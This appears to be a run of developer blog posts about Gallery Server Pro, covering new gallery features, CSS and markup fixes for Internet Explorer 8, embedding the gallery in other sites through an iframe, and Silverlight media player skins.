For 2.3, I broke one of my cardinal rules of web development: target the web standards, not particular browsers. This is generally good advice, but there is great support for adding rounded corners in almost all major browsers using proprietary CSS tags. Rounded corners are so simple to implement, and look so nice, that I just had to do it. Almost every HTML element that previously had square corners now gets a beautiful rounded treatment handled by the browser, not a bunch of image slices. Check it out:

Unfortunately, Internet Explorer, even IE8, does not support rounded corners. This omission in IE8 was a big disappointment, but those of you using other browsers (Firefox, Safari, Chrome) will see elegant shapes in your gallery.

In addition, there is a button for downloading the objects in an album in a ZIP file. Clicking the button takes you to a page where you can select one or more media objects or child albums in the current album. The objects you select are zipped up and sent to the user in a convenient ZIP file.

 

Album paging

When an album contains hundreds of objects, it can take a long time to load and become difficult to navigate. There is a new paging option so that only a small number of objects are loaded at a time. Here you can see what happens when the page size is set to eight:

Clicking the next or previous button initiates a lightweight AJAX callback to load the next page. Once a page is loaded, it is stored in the local cache for lightning-quick response. You can change the page size to your preference, including whether you want the paging controls at the top, bottom, or top *and* bottom.

 

Error logging

A new table now stores any errors for later review by administrators. In addition, more information is collected and the e-mail has a more pleasant formatting.

 

Improved PDF handling

PDF documents are now shown in an inline frame. How cool is that!

 

These are just a few of the many improvements! As always, thank you for your donations - you are what keeps this project alive. Peace.

(Nearly) perfect compatibility with Internet Explorer 8

Internet Explorer 8 was released last Thursday, so I installed it and crossed my fingers as I fired up Gallery Server Pro. What would it look like? There has been a lot of talk about how IE8 defaults to a standards-compatible mode that breaks a lot of existing web sites. But I was hopeful since I built GSP to be XHTML 1.0 Strict compliant, which should provide maximum forward compatibility.

And that proved to be true. All of the HTML I wrote worked perfectly in IE8. Woo HOO! This proves the power of web standards and why it is important to develop against the standards instead of against one or two specific browsers. I am also pleased that Microsoft defaults to standards mode - that should make future upgrades go smoothly.

I wish the story ended here. Did you notice the qualification in what I wrote: "All of the HTML *I wrote* worked perfectly in IE8." GSP uses a set of UI widgets from ComponentArt for several complex features like uploading, the menu, toolbar, grid, and pop-up dialogs. I found three cases where the controls were not behaving well in IE8. The good news is that the issues are minor and do not break the page functionality, so you may be happy just living with them until they are resolved in the next release. You can also click the IE7-compatibility button next to the address bar in IE8 to re-render the page according to IE7 standards. I'll describe each one, along with instructions for how you can fix them right away.

Left aligned toolbar

The toolbar above the media object is left-aligned rather than centered:

This issue is caused by ComponentArt code outputting slightly different HTML when it senses IE 5.5 and higher. Presumably they did this as a workaround to some issue. This is a perfect example of how special-casing code for certain browsers can be problematic, and should be avoided when possible.

Fortunately, the fix is simple. Add Style="display:block;" to the Toolbar definition in gs\controls\mediaobjectview.ascx, like this:

<ComponentArt:ToolBar ID="tbMediaObjectActions" runat="server" Style="display:block;" ... />

Extra thick lines in Actions menu

The line break that separates items in the Actions menu appears about 15 pixels high instead of 1 pixel, as seen here:

This is caused by IE8 making space for the invisible icon in the left column. The fix is to use CSS to remove the icon from the page layout. Open gs\styles\ca_styles.css and look for this line:

.gsp_mnu0MenuBreak { background-image: url(../images/componentart/menu/break_bg.gif); width: 100%; height: 1px; }

Add this line immediately after it:

.gsp_mnu0MenuBreak img { display: none; }

Pop-up dialog windows appearing in the top left corner rather than center of window

There are several places where a dialog window pops up in the center of the screen, but in IE8 it appears in the top left corner. This is caused by a bug in the algorithm for finding the center of the screen when the AnimationType property of the Dialog control is set to "Live". The fix is to change this property to "Outline" on each page where it is defined. Look for the text AnimationType="Live" and change it to AnimationType="Outline" in these files:

gs\controls\mediaobjectview.ascx
gs\pages\admin\manageroles.ascx
gs\pages\admin\manageusers.ascx (two places)
gs\pages\task\synchronize.ascx

There are also two places in source code where the AnimationType property is set to Live. These define the dialog window for the edit album info popup. Look for this line:

dgEditAlbum.AnimationType = DialogAnimationType.Live

and change it to:

dgEditAlbum.AnimationType = DialogAnimationType.Outline

The change is needed in these two files (note that this change can only be done in the source code version of GSP and you must recompile after the change):

gs\controls\albumheader.ascx.cs
gs\controls\mediaobjectview.ascx.cs

Any other issues?

I did not do an exhaustive test of IE8, so let me know if you notice any other issue. Thanks!

Adding a gallery to your web site

One of the great new features in Gallery Server Pro 2.2 is that all the functionality is contained within a single ASP.NET user control. This makes it easy to integrate into your current ASP.NET application. But did you know you can add a gallery to any web site regardless of the technology? I'll tell you how, but first let me show you how easy it is to add a gallery to your ASP.NET app.

Integrating into an existing ASP.NET application

There are three basic steps:

1. Copy the Gallery Server Pro files into your web site. Most of them can be placed in a directory of your choosing. A few, such as the SQLite database, .resx resource file, and the compiled dll's, go into pre-defined ASP.NET directories, such as App_Data, App_GlobalResources, and bin.
2. Configure web.config to define a few settings required by Gallery Server Pro and add one line of code to the Application_Start event in global.asax.
3. Choose one of your web pages to host the gallery. For example, you might create a new .aspx page that implements your current master page. Add the following to the top of the page:

<%@ Register TagPrefix="gsp" Namespace="GalleryServerPro.Web" Assembly="GalleryServerPro.Web" %>

At the location in the page where you want the gallery to appear, add:

<gsp:Gallery ID="gallery1" runat="server" />

That's it! Fire up the page and you will notice Gallery Server Pro appears in the location you defined. All the functionality that exists, such as logging on, searching, and the task and admin pages, are at your fingertips. One user control that rules it all...

Your app can be written in VB.NET, C#, or any other .NET supported language. You can integrate with your existing membership database or Active Directory users. The world is your oyster.

Integrate into non-ASP.NET web sites

Your gallery is not limited to only ASP.NET web sites. No matter what technology your web site uses, whether it is a set of static .html pages or a dynamic PHP or java site, you can add a Gallery Server Pro gallery. All it takes is a little sleight of hand. The trick is to install Gallery Server Pro as an ASP.NET application on an internet-accessible server that satisfies the technology requirements (primarily that it can run ASP.NET). It could be the same server hosting your web site or another one hosted by a different company. Just get it installed somewhere. Then, in one of the pages of your existing site, add an <iframe> tag to point to the gallery like this:

<iframe id="gs" src="http://www.site.com/gallery/" frameborder="0" style="width:100%;height:100%;border:none;" />

Replace "http://www.site.com/gallery/" with the correct URL.

The host page will load the gallery into the iframe element. To your users, it appears integrated with the rest of the web site. For example, below is a screenshot where Gallery Server Pro is integrated into a Classic ASP web site.

Want to see it in action? Check out the Fort Atkinson Area Chamber of Commerce photo gallery. Notice the web site is a Classic ASP site and the gallery is contained within an <iframe> tag. Two very different technologies, but they seamlessly work together.

There are full step-by-step instructions for both of these techniques, along with additional tips and tricks, in the Admin Guide. Have fun!

Cool Tip: Skinning the media player

Gallery Server Pro uses Silverlight to provide a rich user experience for all media types that Silverlight currently supports. In Silverlight 2, that includes Windows Media Video (.wmv), Windows Media Audio (.wma), MP3 audio (.mp3), Advanced Streaming Format (.asf), and Advanced Stream Redirector (.asx) files. Future versions of Silverlight are expected to add even more.

There are several skins available that allow you to change the appearance and function of the player control. By default, the AudioGray skin is for audio and Professional is used for video:

 

Gallery Server Pro includes eight different skins. A skin is a .xaml file and is stored in the gs\skins\mediaplayer directory. Here is a quick preview of all the skins:

Basic (Basic.xaml)

Lightweight .xaml file. Does not include any visible controls. Start/pause a video by clicking it with the mouse.

Simple (Simple.xaml)

Does not include borders just like the Basic skin, but a control panel appears when the mouse hovers over the video.

Classic (Classic.xaml)

Console (Console.xaml)

 

Expression (Expression.xaml)
This skin uses a semi-transparent control panel that appears when you hover over the video, as seen below. Normally, the controls are hidden.

Futuristic (Futuristic.xaml)

Professional (Professional.xaml)

AudioGray (AudioGray.xaml)

This skin is used for audio-only media.

 

You can change to a different skin by editing the galleryserverpro.config file. For the adventurous you can even modify an existing skin or create your own by using any text editor or a XAML editor like Microsoft Expression Blend.

For more information about changing skins in your gallery, check out the document: How To: Skinning the Silverlight Media Player

Updated Administrator's Guide

I finished updating the Administrator's Guide to reflect the changes in Gallery Server Pro 2.2. This includes new sections for the upgrade wizard and integrating a gallery into your existing web site. I also proof read the rest of the document line by line, expanding topics, changing wording, clarifying sentences, and fixing typos to make things as clear as possible. One of the key benefits of Gallery Server Pro is rock solid documentation, and this guide is the best release to date! My eyes have gone buggy but you are worth it. :-)

If you find that the guide does not cover a topic you want to learn about, let me know. And, as always, please tell me about any errors or typos you find.